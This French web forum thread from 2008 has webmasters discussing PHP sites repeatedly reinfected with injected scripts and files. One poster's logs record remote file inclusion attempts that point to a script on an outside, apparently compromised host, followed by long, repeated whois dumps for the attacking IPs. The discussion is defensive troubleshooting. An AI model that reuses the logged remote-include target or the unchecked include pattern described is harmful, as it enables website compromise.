CODE
<?php
echo '<form method="post" action="'.$nom_fichier.'-en.php">';
echo '<input type="image" src="images/english.gif" alt="" />';
echo '<input type="hidden" name="lang" value="en" />';
echo '<form method="post" action="'.$nom_fichier.'.php">';
echo '<input type="image" src="images/francais.gif" alt="" />';
echo '<input type="hidden" name="lang" value="fr" />';
?>
echo '<form method="post" action="'.$nom_fichier.'-en.php">';
echo '<input type="image" src="images/english.gif" alt="" />';
echo '<input type="hidden" name="lang" value="en" />';
echo '<form method="post" action="'.$nom_fichier.'.php">';
echo '<input type="image" src="images/francais.gif" alt="" />';
echo '<input type="hidden" name="lang" value="fr" />';
?>
Est ce que ça vous paraît correct?
Bonjour,
D'après mes statistiques de fréquentation d'hier, j'ai été visité par un site qui s'appelle
reverse.completel.net
Ce qui est bizzare, c'est qu'il a chargé plus de 200Mo de pages, justement au moment où il y avait le problème.
Quelqu'un sait ce que c'est?
D'après mes statistiques de fréquentation d'hier, j'ai été visité par un site qui s'appelle
reverse.completel.net
Ce qui est bizzare, c'est qu'il a chargé plus de 200Mo de pages, justement au moment où il y avait le problème.
Quelqu'un sait ce que c'est?
CITATION(yack45 @ vendredi 7 mars 2008 à 19:24)
Bonjour,
D'après mes statistiques de fréquentation d'hier, j'ai été visité par un site qui s'appelle
reverse.completel.net
Ce qui est bizzare, c'est qu'il a chargé plus de 200Mo de pages, justement au moment où il y avait le problème.
Quelqu'un sait ce que c'est?
D'après mes statistiques de fréquentation d'hier, j'ai été visité par un site qui s'appelle
reverse.completel.net
Ce qui est bizzare, c'est qu'il a chargé plus de 200Mo de pages, justement au moment où il y avait le problème.
Quelqu'un sait ce que c'est?
Completel et un FAI pour professionnel
Bonjour à tous,
J'ai également le même problème sur mon site (en php),
c'est un site hébergé par siteperso.free.fr que j'ai écrit moi même (je suis ingénieur info/développeur)
Je n'utilise donc pas phpBB et je ne pense pas que ce problème vienne de ce framework...
J'utilise également des URLs du type http://monsite.free.fr?ma_page.php=mon_parametre,
Et au final je me retrouve avec un fichier check.js qui réaparait tous les jours et des ficheirs php avec des noms aléatoires dans pratiquement tous mes répertoires.
Et je trouve églalement du code rajouté dans mes fichiers script et css...
En lisant ce topic, j'ai effacer complètement mon site que j'ai remis à jour avec une version saine et j'ai changé le mot de passe FTP ainsi .htpassword me servant de protection de la partie admin de mon site...
Mais rien n'y fait, le lendemain tout était à nouveau vérolé!!!
Je ne sais plus quoi faire, j'ai remarqué que cela arrive à plusieurs personnes mais je n'ai pas encore trouvé d'explication...
A l'aide!
Merci
Davylux
J'ai également le même problème sur mon site (en php),
c'est un site hébergé par siteperso.free.fr que j'ai écrit moi même (je suis ingénieur info/développeur)
Je n'utilise donc pas phpBB et je ne pense pas que ce problème vienne de ce framework...
J'utilise également des URLs du type http://monsite.free.fr?ma_page.php=mon_parametre,
Et au final je me retrouve avec un fichier check.js qui réaparait tous les jours et des ficheirs php avec des noms aléatoires dans pratiquement tous mes répertoires.
Et je trouve églalement du code rajouté dans mes fichiers script et css...
En lisant ce topic, j'ai effacer complètement mon site que j'ai remis à jour avec une version saine et j'ai changé le mot de passe FTP ainsi .htpassword me servant de protection de la partie admin de mon site...
Mais rien n'y fait, le lendemain tout était à nouveau vérolé!!!
Je ne sais plus quoi faire, j'ai remarqué que cela arrive à plusieurs personnes mais je n'ai pas encore trouvé d'explication...
A l'aide!
Merci
Davylux
CITATION(davylux @ mardi 18 mars 2008 à 09:45)
J'utilise également des URLs du type http://monsite.free.fr?ma_page.php=mon_parametre,
Et au final je me retrouve avec un fichier check.js qui réaparait tous les jours et des ficheirs php avec des noms aléatoires dans pratiquement tous mes répertoires.
Et je trouve églalement du code rajouté dans mes fichiers script et css...
c'est tout simplement qu'il y a des failles dans tes scripts. Que tu dois permettre des include avec des fichier externes ou bien du téléchargement de fichiers (images ou autres), sans vérifier l'extension et le contenu.Et au final je me retrouve avec un fichier check.js qui réaparait tous les jours et des ficheirs php avec des noms aléatoires dans pratiquement tous mes répertoires.
Et je trouve églalement du code rajouté dans mes fichiers script et css...
Ou encore, que tes formulaires permettent d'afficher et d'exécuter du code, html, js, ...
Bonjour,
je suis mois aussi victime depuis quelques temps de cette attaque sur mon site.
Grace aux renseignements de ce forum j'ai peut être trouvé la (l'une des ?) faille sur mon site:
Je passait en paramètre dans l'url le nom de ma page à afficher. Mon script fesait un include du nom de ma pageconcaténé avec l'extention .php
J'ai donc créé un petit scrip affin de récuperer l'adresse ip de la personne essayant d'entrer un autre nom de page.
Je viens d'avoir dix tentatives d'attaques, voici ce que je récupère de deux de mes srcipt:
Alerte 1:
Le: 19/03/2008 à 19:17:43
Page Demandée:http://www.filter-international.com/webservice/aro/ipedido/a/ I
IP: 125.45.197.7FAI: hn.kd.ny.adsl
Utilisateur: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Alerte 2:
Le: 19/03/2008 à 19:07:50
Page Demandée:http://www.filter-international.com/webservice/aro/ipedido/a/
IP: 78.47.78.82FAI: static.82.78.47.78.clients.your-server.de
Utilisateur: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
J'ai aussitôt fait un tracage de l'adresse ip renvoyé par mon script et donc voici ce qu'on me donne:
Pour info la page demandé était (http://) www.filter-international.com/webservice/aro/ipedido/a/ ou se situe un script php.
Ce site a a mon avis lui aussi été hacké.
Voila peut etre quelqu'un pourrat en dire plus
**EDIT Administrateur (TheRec)** Merci d'utiliser la balise CODEBOX à la place de CODE pour présenter un code long.
je suis mois aussi victime depuis quelques temps de cette attaque sur mon site.
Grace aux renseignements de ce forum j'ai peut être trouvé la (l'une des ?) faille sur mon site:
Je passait en paramètre dans l'url le nom de ma page à afficher. Mon script fesait un include du nom de ma pageconcaténé avec l'extention .php
J'ai donc créé un petit scrip affin de récuperer l'adresse ip de la personne essayant d'entrer un autre nom de page.
Je viens d'avoir dix tentatives d'attaques, voici ce que je récupère de deux de mes srcipt:
Alerte 1:
Le: 19/03/2008 à 19:17:43
Page Demandée:http://www.filter-international.com/webservice/aro/ipedido/a/ I
IP: 125.45.197.7FAI: hn.kd.ny.adsl
Utilisateur: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Alerte 2:
Le: 19/03/2008 à 19:07:50
Page Demandée:http://www.filter-international.com/webservice/aro/ipedido/a/
IP: 78.47.78.82FAI: static.82.78.47.78.clients.your-server.de
Utilisateur: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
J'ai aussitôt fait un tracage de l'adresse ip renvoyé par mon script et donc voici ce qu'on me donne:
CODE
78.47.78.82 - DE - GERMANY
static.82.78.47.78.clients.your-server.de.
Le serveur whois.ripe.net à retourné l'information suivante :
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '78.47.78.80 - 78.47.78.87'
inetnum: 78.47.78.80 - 78.47.78.87
netname: RIVERLAND
descr: Riverland
country: DE
admin-c: NS2063-RIPE
tech-c: NS2063-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
source: RIPE # Filtered
person: Norbert Schneider
address: Riverland
address: Nymphenburger Str. 147a
address: 80634 München
address: GERMANY
phone: +49 89255575588
fax-no: +49 89255575589
e-mail: daniel_AT_inovativa.de
nic-hdl: NS2063-RIPE
mnt-by: HOS-GUN
source: RIPE # Filtered
% Information related to '78.46.0.0/15AS24940'
route: 78.46.0.0/15
descr: HETZNER-RZ-NBG-BLK5
origin: AS24940
org: ORG-HOA1-RIPE
mnt-by: HOS-GUN
source: RIPE # Filtered
organisation: ORG-HOA1-RIPE
org-name: Hetzner Online AG
org-type: LIR
address: Hetzner Online AG
Attn. Martin Hetzner
Industriestr. 6
91710 Gunzenhausen
Germany
phone: +49 9831 610061
fax-no: +49 9831 610062
e-mail: info_AT_hetzner.de
admin-c: GM834-RIPE
admin-c: MH375-RIPE
admin-c: RB1502-RIPE
admin-c: SK2374-RIPE
admin-c: HOAC1-RIPE
mnt-ref: HOS-GUN
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
source: RIPE # Filtered
Localisation géographique par IP - IP geographical localization
125.45.197.7 - CN - CHINA
hn.kd.ny.adsl.
Le serveur whois.apnic.net à retourné l'information suivante :
% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 125.40.0.0 - 125.47.255.255
netname: CNCGROUP-HA
descr: CNCGROUP Henan province network
descr: China Network Communications Group Corporation
descr: No.156,Fu-Xing-Men-Nei Street,
descr: Beijing 100031
country: CN
admin-c: CH455-AP
tech-c: WW444-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CNCGROUP-HA
mnt-routes: MAINT-CNCGROUP-RR
status: ALLOCATED PORTABLE
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed_AT_apnic.net 20051011
changed: hm-changed_AT_apnic.net 20051020
source: APNIC
route: 125.40.0.0/13
descr: CNC Group CHINA169 Henan Province Network
country: CN
origin: AS4837
mnt-by: MAINT-CNCGROUP-RR
changed: abuse_AT_cnc-noc.net 20060118
source: APNIC
role: CNCGroup Hostmaster
e-mail: abuse_AT_cnc-noc.net
address: No.156,Fu-Xing-Men-Nei Street,
address: Beijing,100031,P.R.China
nic-hdl: CH455-AP
phone: +86-10-82993155
fax-no: +86-10-82993102
country: CN
admin-c: CH444-AP
tech-c: CH444-AP
changed: abuse_AT_cnc-noc.net 20041119
mnt-by: MAINT-CNCGROUP
source: APNIC
person: Wei Wang
nic-hdl: WW444-AP
e-mail: abuse_AT_public.zz.ha.cn
address: #37 Wei Wu Road, Zhengzhou, Henan Provice
phone: +86-371-65952358
fax-no: +86-371-65968952
country: CN
changed: wangw_AT_data.zz.ha.cn 20060205
mnt-by: MAINT-CNCGROUP-HA
source: APNIC
222.152.200.160 - NZ - NEW ZEALAND
222-152-200-160.jetstream.xtra.co.nz.
Le serveur whois.apnic.net à retourné l'information suivante :
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 222.152.128.0 - 222.152.223.255
netname: FIPD-XTRA-NZ
descr: Telecom Xtra
descr: DSL Dynamic Pools
country: NZ
admin-c: TNZ1-AP
tech-c: TNZ1-AP
notify: abuse_AT_xtra.co.nz
notify: nic_AT_netgate.net.nz
mnt-by: NZTELECOM
changed: dbk1_AT_netgate.net.nz 20041021
status: ALLOCATED NON-PORTABLE
source: APNIC
role: Telecom New ZealandIPRegistry
address: Telecom New Zealand IP Registry
address: 31 Airedale Street,
address: Auckland
country: NZ
phone: +64-9-363-5861
fax-no: +64-9-379-4790
e-mail: nic_AT_global-gateway.net.nz
trouble: abuse_AT_global-gateway.net.nz
admin-c: DBK1-AP
tech-c: BS3-AP
nic-hdl: TNZ1-AP
mnt-by: NZTELECOM
notify: nic_AT_global-gateway.net.nz
changed: dbk1_AT_ggi.net.nz 20031023
changed: dbk1_AT_ggi.net.nz 20041122
source: APNIC
Localisation géographique par IP - IP geographical localization
202.216.177.18 - JP - JAPAN
catv77018.tac-net.ne.jp.
Le serveur whois.apnic.net à retourné l'information suivante :
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 202.216.0.0 - 202.219.255.255
netname: JPNIC-NET-JP
descr: Japan Network Information Center
country: JP
admin-c: JNIC1-AP
tech-c: JNIC1-AP
remarks: JPNIC Allocation Block
remarks: Authoritative information regarding assignments and
remarks: allocations made from within this block can also be
remarks: queried at whois.nic.ad.jp. To obtain an English
remarks: output query whois -h whois.nic.ad.jp x.x.x.x/e
mnt-by: APNIC-HM
mnt-lower: MAINT-JPNIC
changed: apnic-ftp_AT_nic.ad.jp 19991115
status: ALLOCATED PORTABLE
source: APNIC
role: Japan Network Information Center
address: Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
address: Chiyoda-ku, Tokyo 101-0047, Japan
country: JP
phone: +81-3-5297-2311
fax-no: +81-3-5297-2312
e-mail: hostmaster_AT_nic.ad.jp
admin-c: JI13-AP
tech-c: JE53-AP
nic-hdl: JNIC1-AP
mnt-by: MAINT-JPNIC
changed: hm-changed_AT_apnic.net 20041222
changed: hm-changed_AT_apnic.net 20050324
changed: ip-apnic_AT_nic.ad.jp 20051027
source: APNIC
inetnum: 202.216.176.0 - 202.216.191.255
netname: TAC-NET
descr: Tokoname New-TV Corporation
country: JP
admin-c: YF743JP
tech-c: YF743JP
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC WHOIS Gateway at
remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or
remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client
remarks: defaults to Japanese output, use the /e switch for English
remarks: output)
changed: apnic-ftp_AT_nic.ad.jp 20030217
source: JPNIC
196.29.201.170 - MU -
Le serveur whois.arin.net à retourné l'information suivante :
OrgName: African Network Information Center
OrgID: AFRINIC
Address: 03B3 - 3rd Floor - Ebene Cyber Tower
Address: Cyber City
Address: Ebene
Address: Mauritius
City: Ebene
StateProv:
PostalCode: 0001
Country: MU
ReferralServer: whois://whois.afrinic.net
NetRange: 196.0.0.0 - 196.255.255.255
CIDR: 196.0.0.0/8
NetName: NET196
NetHandle: NET-196-0-0-0-0
Parent:
NetType: Allocated to AfriNIC
NameServer: NS1.AFRINIC.NET
NameServer: NS-SEC.RIPE.NET
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
Comment:
RegDate: 1993-05-01
Updated: 2006-04-27
OrgAbuseHandle: GENER11-ARIN
OrgAbuseName: Generic POC
OrgAbusePhone: +230 4666616
OrgAbuseEmail: abusepoc_AT_afrinic.net
OrgTechHandle: GENER11-ARIN
OrgTechName: Generic POC
OrgTechPhone: +230 4666616
OrgTechEmail: abusepoc_AT_afrinic.net
# ARIN WHOIS database, last updated 2008-03-18 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
196.217.249.190 - MU -
adsl196-190-249-217-196.adsl196-16.iam.net.ma.
Le serveur whois.arin.net à retourné l'information suivante :
OrgName: African Network Information Center
OrgID: AFRINIC
Address: 03B3 - 3rd Floor - Ebene Cyber Tower
Address: Cyber City
Address: Ebene
Address: Mauritius
City: Ebene
StateProv:
PostalCode: 0001
Country: MU
ReferralServer: whois://whois.afrinic.net
NetRange: 196.0.0.0 - 196.255.255.255
CIDR: 196.0.0.0/8
NetName: NET196
NetHandle: NET-196-0-0-0-0
Parent:
NetType: Allocated to AfriNIC
NameServer: NS1.AFRINIC.NET
NameServer: NS-SEC.RIPE.NET
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
Comment:
RegDate: 1993-05-01
Updated: 2006-04-27
OrgAbuseHandle: GENER11-ARIN
OrgAbuseName: Generic POC
OrgAbusePhone: +230 4666616
OrgAbuseEmail: abusepoc_AT_afrinic.net
OrgTechHandle: GENER11-ARIN
OrgTechName: Generic POC
OrgTechPhone: +230 4666616
OrgTechEmail: abusepoc_AT_afrinic.net
# ARIN WHOIS database, last updated 2008-03-18 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
218.106.254.83 - CN - CHINA
Le serveur whois.apnic.net à retourné l'information suivante :
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 218.106.240.0 - 218.106.255.255
netname: CNCGROUP-BJ
descr: CNCGROUP Beijing province network
country: CN
admin-c: CH455-AP
tech-c: SY21-AP
status: ASSIGNED NON-PORTABLE
changed: abuse_AT_china-netcom.com 20070716
mnt-by: MAINT-CNCGROUP
mnt-lower: MAINT-CNCGROUP-BJ
source: APNIC
route: 218.104.0.0/14
descr: CNC Group CncNet
country: CN
origin: AS9929
mnt-by: MAINT-CNCGROUP-RR
changed: abuse_AT_cnc-noc.net 20060329
source: APNIC
role: CNCGroup Hostmaster
e-mail: abuse_AT_cnc-noc.net
address: No.156,Fu-Xing-Men-Nei Street,
address: Beijing,100031,P.R.China
nic-hdl: CH455-AP
phone: +86-10-82993155
fax-no: +86-10-82993102
country: CN
admin-c: CH444-AP
tech-c: CH444-AP
changed: abuse_AT_cnc-noc.net 20041119
mnt-by: MAINT-CNCGROUP
source: APNIC
person: sun ying
address: fu xing men nei da jie 97, Xicheng District
address: Beijing 100800
country: CN
phone: +86-10-66030657
fax-no: +86-10-66078815
e-mail: suny_AT_publicf.bta.net.cn
nic-hdl: SY21-AP
mnt-by: MAINT-CNCGROUP-BJ
changed: suny_AT_publicf.bta.net.cn 19980824
changed: hm-changed_AT_apnic.net 20060717
source: APNIC
Localisation géographique par IP - IP geographical localization
221.13.66.161 - CN - CHINA
Le serveur whois.apnic.net à retourné l'information suivante :
% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 221.13.64.0 - 221.13.95.255
netname: CNCGROUP-XZ
descr: CNC Group Xizang province network
descr: China Network Communications Group Corporation
descr: No.156,Fu-Xing-Men-Nei Street,
descr: Beijing 100031
country: CN
admin-c: CH455-AP
tech-c: CH455-AP
remarks: service provider
mnt-by: APNIC-HM
mnt-lower: MAINT-CNCGROUP-XZ
mnt-routes: MAINT-CNCGROUP-RR
status: ALLOCATED PORTABLE
changed: hm-changed_AT_apnic.net 20030528
changed: hm-changed_AT_apnic.net 20060124
source: APNIC
role: CNCGroup Hostmaster
e-mail: abuse_AT_cnc-noc.net
address: No.156,Fu-Xing-Men-Nei Street,
address: Beijing,100031,P.R.China
nic-hdl: CH455-AP
phone: +86-10-82993155
fax-no: +86-10-82993102
country: CN
admin-c: CH444-AP
tech-c: CH444-AP
changed: abuse_AT_cnc-noc.net 20041119
mnt-by: MAINT-CNCGROUP
source: APNIC
196.205.94.68 - ON -
host-196-205-94-68.static.link.com.eg.
Le serveur whois.ripe.net à retourné l'information suivante :
% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag
% Information related to '196.205.0.0 - 196.205.255.255'
inetnum: 196.205.0.0 - 196.205.255.255
org: ORG-AFNC1-RIPE
netname: AFRINIC-NET-TRANSFERRED-20050223
descr: This network has been transferred to AFRINIC
remarks: These IP addresses are assigned in the AFRINIC region.
remarks: Authoritative registration information for this network
remarks: is available for query and modification in
remarks: the AFRINIC whois database: whois.afrinic.net or
remarks: web site: http://www.afrinic.net
remarks: The routing registry information (route(6) objects)
remarks: may be published in any Routing Registry, including
remarks: RIPE Whois Database
country: EU # country is really somewhere in African Region
admin-c: AFRI-RIPE
tech-c: AFRI-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-routes: RIPE-NCC-RPSL-MNT
source: RIPE # Filtered
organisation: ORG-AFNC1-RIPE
org-name: African Internet Numbers Registry
org-type: RIR
address: see http://www.afrinic.net
e-mail: bitbucket_AT_ripe.net
admin-c: AFRI-RIPE
tech-c: AFRI-RIPE
remarks: For more information on AFRINIC assigned blocks, use
remarks: AFRINIC's whois database, whois.afrinic.net.
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
source: RIPE # Filtered
role: The African Internet Numbers Registry
org: ORG-AFNC1-RIPE
address: AFRINIC, see http://www.afrinic.net
admin-c: AFRI-RIPE
tech-c: AFRI-RIPE
nic-hdl: AFRI-RIPE
e-mail: bitbucket_AT_ripe.net
remarks: For more information on AFRINIC assigned blocks, connect
remarks: to AFRINIC's whois database, whois.afrinic.net.
mnt-by: RIPE-NCC-HM-MNT
source: RIPE # Filtered
% Information related to '196.205.0.0/16AS24863'
route: 196.205.0.0/16
descr: LINKdotNET route
origin: AS24863
mnt-by: MAINT-LINK
source: RIPE # Filtered
% Information related to '196.205.92.0/22AS24863'
route: 196.205.92.0/22
descr: LINKdotNET route
origin: AS24863
mnt-by: MAINT-LINK
source: RIPE # Filtered
% Information related to '196.205.88.0/21AS24863'
route: 196.205.88.0/21
descr: LINKdotNET route
origin: AS24863
mnt-by: MAINT-LINK
source: RIPE # Filtered
% Information related to '196.205.0.0/17AS24863'
route: 196.205.0.0/17
descr: LINKdotNET route
origin: AS24863
mnt-by: MAINT-LINK
source: RIPE # Filtered
222.129.202.131 - CN - CHINA
Le serveur whois.apnic.net à retourné l'information suivante :
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 222.128.0.0 - 222.131.255.255
netname: CNCGROUP-BJ
descr: CNCGROUP Beijing province network
descr: China Network Communications Group Corporation
descr: No.156,Fu-Xing-Men-Nei Street,
descr: Beijing 100031
country: CN
admin-c: CH455-AP
tech-c: SY21-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CNCGROUP-BJ
mnt-routes: MAINT-CNCGROUP-RR
changed: hm-changed_AT_apnic.net 20031119
status: ALLOCATED PORTABLE
changed: hm-changed_AT_apnic.net 20060124
source: APNIC
role: CNCGroup Hostmaster
e-mail: abuse_AT_cnc-noc.net
address: No.156,Fu-Xing-Men-Nei Street,
address: Beijing,100031,P.R.China
nic-hdl: CH455-AP
phone: +86-10-82993155
fax-no: +86-10-82993102
country: CN
admin-c: CH444-AP
tech-c: CH444-AP
changed: abuse_AT_cnc-noc.net 20041119
mnt-by: MAINT-CNCGROUP
source: APNIC
person: sun ying
address: fu xing men nei da jie 97, Xicheng District
address: Beijing 100800
country: CN
phone: +86-10-66030657
fax-no: +86-10-66078815
e-mail: suny_AT_publicf.bta.net.cn
nic-hdl: SY21-AP
mnt-by: MAINT-CNCGROUP-BJ
changed: suny_AT_publicf.bta.net.cn 19980824
changed: hm-changed_AT_apnic.net 20060717
source: APNIC
78.47.78.82 - DE - GERMANY
static.82.78.47.78.clients.your-server.de.
Le serveur whois.ripe.net à retourné l'information suivante :
% This is the RIPE Whois query server #3.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '78.47.78.80 - 78.47.78.87'
inetnum: 78.47.78.80 - 78.47.78.87
netname: RIVERLAND
descr: Riverland
country: DE
admin-c: NS2063-RIPE
tech-c: NS2063-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
source: RIPE # Filtered
person: Norbert Schneider
address: Riverland
address: Nymphenburger Str. 147a
address: 80634 München
address: GERMANY
phone: +49 89255575588
fax-no: +49 89255575589
e-mail: daniel_AT_inovativa.de
nic-hdl: NS2063-RIPE
mnt-by: HOS-GUN
source: RIPE # Filtered
% Information related to '78.46.0.0/15AS24940'
route: 78.46.0.0/15
descr: HETZNER-RZ-NBG-BLK5
origin: AS24940
org: ORG-HOA1-RIPE
mnt-by: HOS-GUN
source: RIPE # Filtered
organisation: ORG-HOA1-RIPE
org-name: Hetzner Online AG
org-type: LIR
address: Hetzner Online AG
Attn. Martin Hetzner
Industriestr. 6
91710 Gunzenhausen
Germany
phone: +49 9831 610061
fax-no: +49 9831 610062
e-mail: info_AT_hetzner.de
admin-c: GM834-RIPE
admin-c: MH375-RIPE
admin-c: RB1502-RIPE
admin-c: SK2374-RIPE
admin-c: HOAC1-RIPE
mnt-ref: HOS-GUN
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
source: RIPE # Filtered
static.82.78.47.78.clients.your-server.de.
Le serveur whois.ripe.net à retourné l'information suivante :
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '78.47.78.80 - 78.47.78.87'
inetnum: 78.47.78.80 - 78.47.78.87
netname: RIVERLAND
descr: Riverland
country: DE
admin-c: NS2063-RIPE
tech-c: NS2063-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
source: RIPE # Filtered
person: Norbert Schneider
address: Riverland
address: Nymphenburger Str. 147a
address: 80634 München
address: GERMANY
phone: +49 89255575588
fax-no: +49 89255575589
e-mail: daniel_AT_inovativa.de
nic-hdl: NS2063-RIPE
mnt-by: HOS-GUN
source: RIPE # Filtered
% Information related to '78.46.0.0/15AS24940'
route: 78.46.0.0/15
descr: HETZNER-RZ-NBG-BLK5
origin: AS24940
org: ORG-HOA1-RIPE
mnt-by: HOS-GUN
source: RIPE # Filtered
organisation: ORG-HOA1-RIPE
org-name: Hetzner Online AG
org-type: LIR
address: Hetzner Online AG
Attn. Martin Hetzner
Industriestr. 6
91710 Gunzenhausen
Germany
phone: +49 9831 610061
fax-no: +49 9831 610062
e-mail: info_AT_hetzner.de
admin-c: GM834-RIPE
admin-c: MH375-RIPE
admin-c: RB1502-RIPE
admin-c: SK2374-RIPE
admin-c: HOAC1-RIPE
mnt-ref: HOS-GUN
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
source: RIPE # Filtered
Localisation géographique par IP - IP geographical localization
125.45.197.7 - CN - CHINA
hn.kd.ny.adsl.
Le serveur whois.apnic.net à retourné l'information suivante :
% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 125.40.0.0 - 125.47.255.255
netname: CNCGROUP-HA
descr: CNCGROUP Henan province network
descr: China Network Communications Group Corporation
descr: No.156,Fu-Xing-Men-Nei Street,
descr: Beijing 100031
country: CN
admin-c: CH455-AP
tech-c: WW444-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CNCGROUP-HA
mnt-routes: MAINT-CNCGROUP-RR
status: ALLOCATED PORTABLE
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed_AT_apnic.net 20051011
changed: hm-changed_AT_apnic.net 20051020
source: APNIC
route: 125.40.0.0/13
descr: CNC Group CHINA169 Henan Province Network
country: CN
origin: AS4837
mnt-by: MAINT-CNCGROUP-RR
changed: abuse_AT_cnc-noc.net 20060118
source: APNIC
role: CNCGroup Hostmaster
e-mail: abuse_AT_cnc-noc.net
address: No.156,Fu-Xing-Men-Nei Street,
address: Beijing,100031,P.R.China
nic-hdl: CH455-AP
phone: +86-10-82993155
fax-no: +86-10-82993102
country: CN
admin-c: CH444-AP
tech-c: CH444-AP
changed: abuse_AT_cnc-noc.net 20041119
mnt-by: MAINT-CNCGROUP
source: APNIC
person: Wei Wang
nic-hdl: WW444-AP
e-mail: abuse_AT_public.zz.ha.cn
address: #37 Wei Wu Road, Zhengzhou, Henan Provice
phone: +86-371-65952358
fax-no: +86-371-65968952
country: CN
changed: wangw_AT_data.zz.ha.cn 20060205
mnt-by: MAINT-CNCGROUP-HA
source: APNIC
222.152.200.160 - NZ - NEW ZEALAND
222-152-200-160.jetstream.xtra.co.nz.
Le serveur whois.apnic.net à retourné l'information suivante :
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 222.152.128.0 - 222.152.223.255
netname: FIPD-XTRA-NZ
descr: Telecom Xtra
descr: DSL Dynamic Pools
country: NZ
admin-c: TNZ1-AP
tech-c: TNZ1-AP
notify: abuse_AT_xtra.co.nz
notify: nic_AT_netgate.net.nz
mnt-by: NZTELECOM
changed: dbk1_AT_netgate.net.nz 20041021
status: ALLOCATED NON-PORTABLE
source: APNIC
role: Telecom New ZealandIPRegistry
address: Telecom New Zealand IP Registry
address: 31 Airedale Street,
address: Auckland
country: NZ
phone: +64-9-363-5861
fax-no: +64-9-379-4790
e-mail: nic_AT_global-gateway.net.nz
trouble: abuse_AT_global-gateway.net.nz
admin-c: DBK1-AP
tech-c: BS3-AP
nic-hdl: TNZ1-AP
mnt-by: NZTELECOM
notify: nic_AT_global-gateway.net.nz
changed: dbk1_AT_ggi.net.nz 20031023
changed: dbk1_AT_ggi.net.nz 20041122
source: APNIC
Localisation géographique par IP - IP geographical localization
202.216.177.18 - JP - JAPAN
catv77018.tac-net.ne.jp.
Le serveur whois.apnic.net à retourné l'information suivante :
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 202.216.0.0 - 202.219.255.255
netname: JPNIC-NET-JP
descr: Japan Network Information Center
country: JP
admin-c: JNIC1-AP
tech-c: JNIC1-AP
remarks: JPNIC Allocation Block
remarks: Authoritative information regarding assignments and
remarks: allocations made from within this block can also be
remarks: queried at whois.nic.ad.jp. To obtain an English
remarks: output query whois -h whois.nic.ad.jp x.x.x.x/e
mnt-by: APNIC-HM
mnt-lower: MAINT-JPNIC
changed: apnic-ftp_AT_nic.ad.jp 19991115
status: ALLOCATED PORTABLE
source: APNIC
role: Japan Network Information Center
address: Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
